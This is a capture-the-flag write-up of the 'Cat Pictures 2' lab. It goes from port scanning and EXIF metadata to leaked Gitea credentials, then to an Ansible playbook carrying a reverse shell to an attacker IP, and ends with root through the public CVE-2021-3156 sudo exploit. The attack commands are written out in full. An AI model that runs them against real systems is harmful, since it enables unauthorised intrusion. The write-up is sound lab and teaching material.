Skip to main content

Cat Pictures 2

1. Reconnaissance & Enumeration

1.1 Initial Port Scan

export TARGET_IP=10.10.130.75
nmap -p- --min-rate 5000 $TARGET_IP

Results:

Not shown: 65292 closed tcp ports (reset), 237 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
222/tcp open rsh-spx
1337/tcp open waste
3000/tcp open ppp
8080/tcp open http-proxy

1.2 Website Enumeration & Metadata Extraction

Browsing to http://10.10.130.75 reveals a website displaying cat pictures. Examining the first image description we notice a comment: "note to self: strip metadata." This strongly suggests hidden information in the image EXIF data.

We download a specific image and use exiftool to extract its metadata:

wget http://10.10.130.75/uploads/medium/f5054e97620f168c7b5088c85ab1d6e4.jpg
exiftool f5054e97620f168c7b5088c85ab1d6e4.jpg

Key Finding:

The Title field in the EXIF data contains: :8080/764efa883dda1e11db47671c4a3bbd9e.txt. This is a strong indicator of a hidden file on port 8080.

1.3 Hidden File Retrieval

We access the revealed URL: http://10.10.130.75:8080/764efa883dda1e11db47671c4a3bbd9e.txt.

Contents:

I setup an internal gitea instance to start using IaC for this server. It's at a quite basic state, but I'm putting the password here because I will definitely forget.
This file isn't easy to find anyway unless you have the correct url...

gitea: port 3000
user: samarium
password: TUmhyZ37CLZrhP

ansible runner (olivetin): port 1337

Analysis:

  • Gitea Instance: A self-hosted Git service (similar to GitHub) is running on port 3000. We have credentials!
  • Ansible Runner: An Ansible automation tool is accessible on port 1337.
  • User: samarium Password: TUmhyZ37CLZrhP

2. Exploitation

2.1 Gitea Access & Flag 1

Using the discovered credentials, we log in to the Gitea instance at http://10.10.130.75:3000. Within the repository, we find flag1.txt in the samarium/ansible repository.

  • Flag 1 Location: http://10.10.130.75:3000/samarium/ansible/src/branch/main/flag1.txt

2.2 Ansible Playbook Manipulation & Reverse Shell

The Gitea repository contains an Ansible playbook (playbook.yaml). The Ansible runner on port 1337 executes this playbook. This presents a classic code injection opportunity.

Modified Playbook (Reverse Shell Injection):

playbook.yaml
---
- name: Test
hosts: all # Define all the hosts
remote_user: bismuth
# Defining the Ansible task
tasks:
- name: get the username running the deploy
become: false
command: bash -c "sh -i >& /dev/tcp/10.2.17.44/6666 0>&1"
register: username_on_the_host
changed_when: false

- debug: var=username_on_the_host

- name: Test
shell: echo hi

Steps:

  1. Modify playbook.yaml: Update the playbook in the Gitea repository with the reverse shell code.
  2. Start Listener: On your attacking machine, start a Netcat listener: nc -lvnp 6666
  3. Trigger Playbook: Navigate to http://10.10.130.75:1337/ and click the "Run Ansible Playbook" button.
  4. Receive Shell: Your Netcat listener should receive a connection, giving you a shell as the bismuth user.
# Attacker Machine
nc -lvnp 6666

# (After triggering the playbook)
# Connection received!
id # uid=1000(bismuth) gid=1000(bismuth) groups=1000(bismuth),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare)

3. Privilege Escalation

3.1 Local Enumeration with LinPEAS

To identify potential privilege escalation paths, we'll use LinPEAS, a comprehensive enumeration script.

Steps:

  1. Download LinPEAS: Obtain linpeas.sh from the official PEASS-ng repository: https://github.com/carlospolop/PEASS-ng/releases
  2. Transfer to Target:
    • Attacker Machine: Start a simple HTTP server: python3 -m http.server 80
    • Target Machine (bismuth shell): Download LinPEAS: wget http://10.2.17.44/linpeas.sh
    • Target Machine: Make it executable: chmod +x linpeas.sh
  3. Run LinPEAS: Execute the script: ./linpeas.sh

3.2 Identifying the Vulnerability

LinPEAS output highlights a vulnerable sudo version: Sudo version 1.8.21p2. This version is known to be susceptible to CVE-2021-3156 (Heap-Based Buffer Overflow).

3.3 Exploiting CVE-2021-3156

We'll use a publicly available exploit for CVE-2021-3156.

Steps:

  1. Obtain Exploit: Clone the exploit repository from GitHub:
    Attacker Machine
    git clone https://github.com/blasty/CVE-2021-3156
  2. Prepare for Transfer: Create a tar archive for easier transfer:
    Attacker Machine
    tar -cvf exploit.tar CVE-2021-3156
    python3 -m http.server 80 # If not already running
  3. Transfer and Extract:
    Target Machine
    cd /tmp  # Good practice to work in /tmp for exploits
    wget http://10.2.17.44/exploit.tar
    tar xopf exploit.tar
    cd CVE-2021-3156
  4. Compile and Run:
    Target Machine
    make
    ./sudo-hax-me-a-sandwich 0 # Run with target 0 (check available targets with ./sudo-hax-me-a-sandwich)

3.4 Root Shell and Flag 3

If the exploit is successful, you should obtain a root shell.

id  # uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1000(bismuth)
cat /root/flag3.txt # Retrieve the final flag